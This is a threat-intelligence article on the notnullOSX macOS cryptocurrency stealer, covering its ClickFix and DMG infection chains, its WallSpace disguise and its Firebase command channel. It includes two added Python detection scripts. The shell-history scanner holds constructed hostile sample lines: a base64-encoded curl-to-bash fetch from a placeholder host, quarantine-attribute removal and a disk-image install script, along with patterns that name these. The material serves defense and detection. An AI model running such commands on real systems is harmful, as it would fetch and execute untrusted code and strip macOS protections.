Rise of notnullOSX: A New Threat to macOS Users
Recent reports have surfaced about a sophisticated malicious software, termed notnullOSX, which is specifically designed to target macOS users who possess substantial cryptocurrency holdings. This stealer is being disseminated through deceptive ClickFix commands and booby-trapped DMG installers, leading to significant security risks for Mac users.
The origins of this alarming development can be traced back to 0xFFF, a malware developer who made headlines when he suddenly exited a prominent Russian-speaking hacking forum in 2023. His departure was marked by claims of an investigation into his activities and accusations against the forum of collaborating with law enforcement agencies. It was at this juncture that he touted the creation of a new, ruthless tool designed to specifically plunder cryptocurrency wallets for users holding amounts exceeding USD 10,000.
By August 2024, 0xFFF resurfaced under the alias alh1mik, re-establishing his presence on Telegram with promises of a new macOS stealer. This gesture was part of an effort to regain his reputation within the cybercrime community. The culmination of this venture was notnullOSX, which became operational by early 2026. The malware is designed as a modular implant that is disseminated through custom lures, an affiliate panel, and a dedicated ecosystem for operators.
Initial Infection: The Deceptive Google Document
The notnullOSX infection process begins with an enticing bait: a fake “protected” Google document, as identified by the researcher @g0njxa on X. Victims encounter a misleading error message indicating that encryption has failed due to an outdated “Google API Connector.” This message presents two seemingly legitimate options to “fix” the issue, but both paths ultimately lead to malware installation.
Prior to unleashing a lure, operators take a meticulous approach by submitting detailed target profiles through an affiliate panel. This includes social media links, prior interactions, and the victim’s cryptocurrency wallet address, explicitly enforcing a threshold that excludes wallets holding less than $10,000. This strategy ensures that the campaign is directed towards high-value targets, enhancing the potential payoff.
Two Infection Routes
The campaign employs two parallel social-engineering chains, both converging on the same malicious implant:
- ClickFix Chain: Victims are instructed to open Terminal and run a base64-encoded command that retrieves a bash installer from the attackers’ infrastructure. This script downloads a Mach-O payload, removes security flags, and embeds it within a minimal application. The user is then carefully guided to grant full disk access to this fake application, inadvertently providing the malware with extensive access to personal data.
- DMG Chain: In this route, victims encounter a malicious disk image displaying files like Install.sh and README.txt, instructing them to execute a terminal alias that leads to the same malware installation process as the ClickFix method.
Both methods rely not on external exploits, but rather on manipulation of user actions, circumventing traditional security measures.
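Because both chains run through the victim's own Terminal, the commands leave traces a defender can hunt for: shell history files, or process-execution telemetry from an EDR. The following is an added example (not code from the article or from the researchers it cites) that scans command lines for the indicators the two chains share: a base64 blob piped into a shell, a remote script piped into a shell, and an `Install.sh` launched from a mounted disk image. It also decodes embedded base64 so the hidden command is scanned too. Reading "removes security flags" as removal of the `com.apple.quarantine` extended attribute via `xattr` is this example's assumption, and every sample line is constructed.

```python
"""
Heuristic scanner for ClickFix-style terminal commands (added example).

Input is a list of shell command lines, e.g. from ~/.zsh_history or an
EDR's process-execution feed. Each line is checked against a set of
indicators, and any embedded base64 blob is decoded and checked as well,
so a command hidden inside "echo <blob> | base64 -d | bash" is still seen.
All sample lines below are constructed for this example.
"""
import base64
import re

# Indicators for the two chains described above. Treating "removes
# security flags" as removal of the com.apple.quarantine attribute is
# an assumption of this example, not something the article states.
INDICATORS = {
    "base64_to_shell": re.compile(
        r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b"),
    "remote_script_to_shell": re.compile(
        r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b"),
    "quarantine_removal": re.compile(
        r"\bxattr\b.*?(?:-c\b|-r?d\s+com\.apple\.quarantine\b)"),
    "dmg_install_script": re.compile(
        r"/Volumes/\S+/Install\.sh\b"),
}

# A run of base64-alphabet characters long enough to hold a command.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_embedded_base64(line):
    """Return the decoded text of every base64 blob in `line` that
    decodes to printable text; binary or badly padded blobs are skipped."""
    decoded = []
    for match in B64_BLOB.finditer(line):
        blob = match.group(0)
        if len(blob) % 4:          # not valid base64 length, e.g. a path
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:         # binascii.Error is a ValueError subclass
            continue
        text = raw.decode("utf-8", errors="replace")
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def scan_line(line):
    """Return the indicator names one command line triggers. Hits found
    inside a decoded base64 blob are prefixed with 'decoded:'."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(line)]
    for text in decode_embedded_base64(line):
        hits += ["decoded:" + name
                 for name, rx in INDICATORS.items() if rx.search(text)]
    return hits


def scan_history(lines):
    """Map 1-based line numbers to their indicator hits; clean lines are
    omitted so the result is empty for a history with nothing of note."""
    findings = {}
    for number, line in enumerate(lines, start=1):
        hits = scan_line(line)
        if hits:
            findings[number] = hits
    return findings


# Constructed sample history: benign commands plus one line per chain.
# The blob is built here so the example stays self-contained; the URL
# uses the reserved .invalid TLD and is not a real attacker host.
_ENCODED = base64.b64encode(
    b"curl -fsSL http://example.invalid/install.sh | bash").decode()
SAMPLE_HISTORY = [
    "ls -la ~/Documents",
    f"echo {_ENCODED} | base64 -d | bash",            # ClickFix chain
    "xattr -d com.apple.quarantine /tmp/Helper.app",  # flag removal
    "/Volumes/WallSpace/Install.sh",                  # DMG chain
    "git status",
]

if __name__ == "__main__":
    for number, hits in scan_history(SAMPLE_HISTORY).items():
        print(f"line {number}: {', '.join(hits)}")
```

The decoded-blob pass matters more than the surface patterns: a ClickFix page can vary the wrapper (`bash -c "$(echo … | base64 -d)"`, `zsh`, `-D` versus `--decode`) far more easily than it can avoid eventually fetching and running a script, so the indicators on the decoded text are the ones to keep strict and the wrappers are where to stay loose.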
WallSpace Disguise and Distribution Tactics
Further analysis by Moonlock Lab revealed that notnullOSX has been disguised under appealing names such as WallSpace.app, which mimics a legitimate macOS live wallpaper application. However, attempts to download from wallpapermacos[.]com result in immediate cloud security warnings, raising alarms about malware presence.
Visitors are lured by the polished website claiming to offer free wallpapers, yet investigation shows that the download path raises malware flags. Curiously, another domain, wallspaceapp[.]com, emerged at the top of Google search results for related queries, linked to a classic ClickFix page that further directs users to execute harmful terminal commands.
Moreover, the distribution of notnullOSX was funneled through a seemingly innocent YouTube channel. While originally created in 2015, it was recently redirected to host a singular WallSpace video that amassed tens of thousands of views, showcasing a pattern of hijacking and boosting channels for malicious ends.
The Modular Framework of notnullOSX
The main payload of notnullOSX is a robust, multi-architecture Mach-O binary that is not widely flagged by antivirus solutions, often misclassified as “adware” or “potentially unwanted.” Once installed and granted full disk access, the malware operates as a modular stealer, downloading various components from a legitimate CDN and executing them to harvest specific types of information.
Documented modules include those targeting system information, iMessages, Apple notes, browser cookies, and most alarmingly, cryptocurrency wallets. A particularly devious feature named ReplaceApp even allows the malware to swap legitimate crypto wallet applications with trojanized replicas, stealing seed phrases during setup.
In contrast to typical smash-and-grab methods, notnullOSX maintains a persistent, TLS-encrypted communication channel with its command-and-control server through Firebase Realtime Database. This setup allows for real-time commands and data exfiltration, significantly enhancing its stealth capabilities.
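A C2 channel riding on Firebase is hard to block by destination, because the same hosts serve countless legitimate web and mobile apps; what stands out instead is which process holds the connection and from where. The following is an added example (not the article's or Moonlock Lab's code) that triages connection records: it flags a persistent Firebase Realtime Database connection only when the owning process is not an expected one, or its executable lives outside the standard application directories. The Firebase host suffixes come from Firebase's public documentation rather than from the article, the process allowlist and path prefixes are this example's assumptions to be tuned per fleet, and all connection records are constructed.

```python
"""
Triage of Firebase Realtime Database connections by owning process
(added example; all connection records below are constructed).
"""
from dataclasses import dataclass

# Firebase RTDB hostnames end in one of these suffixes. This is from
# Firebase's public documentation, not from the article.
RTDB_SUFFIXES = (".firebaseio.com", ".firebasedatabase.app")

# Processes that may legitimately talk to Firebase for hours at a time
# (web apps in a browser). An assumption to tune for the fleet in question.
ALLOWED_PROCESSES = {"Safari", "Google Chrome", "firefox"}

# Where signed, installed software normally lives on macOS; an executable
# elsewhere (a temp directory, a per-user folder) deserves a second look.
TRUSTED_PREFIXES = ("/Applications/", "/System/", "/usr/bin/", "/usr/libexec/")


@dataclass
class Connection:
    """One observed outbound TLS connection, as an EDR or firewall log
    might record it (field names are this example's own)."""
    process: str
    exe_path: str
    dest_host: str
    dest_port: int
    seconds_open: int


def is_rtdb_host(host):
    """True if `host` is a Firebase Realtime Database endpoint."""
    host = host.lower().rstrip(".")
    return any(host.endswith(suffix) for suffix in RTDB_SUFFIXES)


def suspicious_reasons(conn, persist_threshold=300):
    """Return the reasons `conn` merits review, or [] if it looks normal.

    A browser in /Applications holding a Firebase connection open is the
    expected case and is never flagged; duration alone is not a reason,
    it is recorded as context once the process or path is unexpected.
    """
    if not is_rtdb_host(conn.dest_host):
        return []
    reasons = []
    if conn.process not in ALLOWED_PROCESSES:
        reasons.append("unexpected process for Firebase RTDB traffic")
    if not conn.exe_path.startswith(TRUSTED_PREFIXES):
        reasons.append("executable outside standard application paths")
    if not reasons:
        return []
    if conn.seconds_open >= persist_threshold:
        reasons.append(f"connection held open {conn.seconds_open}s")
    return reasons


def triage(connections):
    """Return (connection, reasons) pairs for every record worth review."""
    results = []
    for conn in connections:
        reasons = suspicious_reasons(conn)
        if reasons:
            results.append((conn, reasons))
    return results


# Constructed records: two browsers doing normal Firebase traffic, a
# short curl to a CDN-like host, and an app under a per-user path that
# holds an RTDB connection open for an hour. Hostnames are placeholders.
SAMPLE_CONNECTIONS = [
    Connection("Safari", "/Applications/Safari.app/Contents/MacOS/Safari",
               "demo-project-default-rtdb.firebaseio.com", 443, 1200),
    Connection("Google Chrome",
               "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
               "demo-project.europe-west1.firebasedatabase.app", 443, 600),
    Connection("curl", "/usr/bin/curl", "cdn.example.invalid", 443, 2),
    Connection("WallSpace",
               "/Users/alice/Library/Application Support/WallSpace.app/"
               "Contents/MacOS/WallSpace",
               "constructed-example-default-rtdb.firebaseio.com", 443, 3600),
]

if __name__ == "__main__":
    for conn, reasons in triage(SAMPLE_CONNECTIONS):
        print(f"{conn.process} ({conn.exe_path}) -> {conn.dest_host}")
        for reason in reasons:
            print("  -", reason)
```

The allowlist is deliberately short. Adding every app that embeds Firebase would erode the check; the better move is to allow by code-signing identity rather than process name once the fleet's telemetry carries it, since a trojanized replica of a wallet app can keep the original's name but not its signature.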
Conclusion
The first recorded instances of notnullOSX appearing in the wild date back to March 30, 2026, affecting users in regions such as Vietnam, Taiwan, and Spain. This ongoing threat poses a considerable challenge for cybersecurity professionals, drawing attention to the escalating sophistication of targeted malware campaigns.
The emergence of notnullOSX underscores several lessons for defenders: socially engineered terminal commands have become a routine malware distribution technique, full disk access prompts should be treated as potential red flags, and high-value crypto users face heightened risk from such advanced, modular stealing operations.
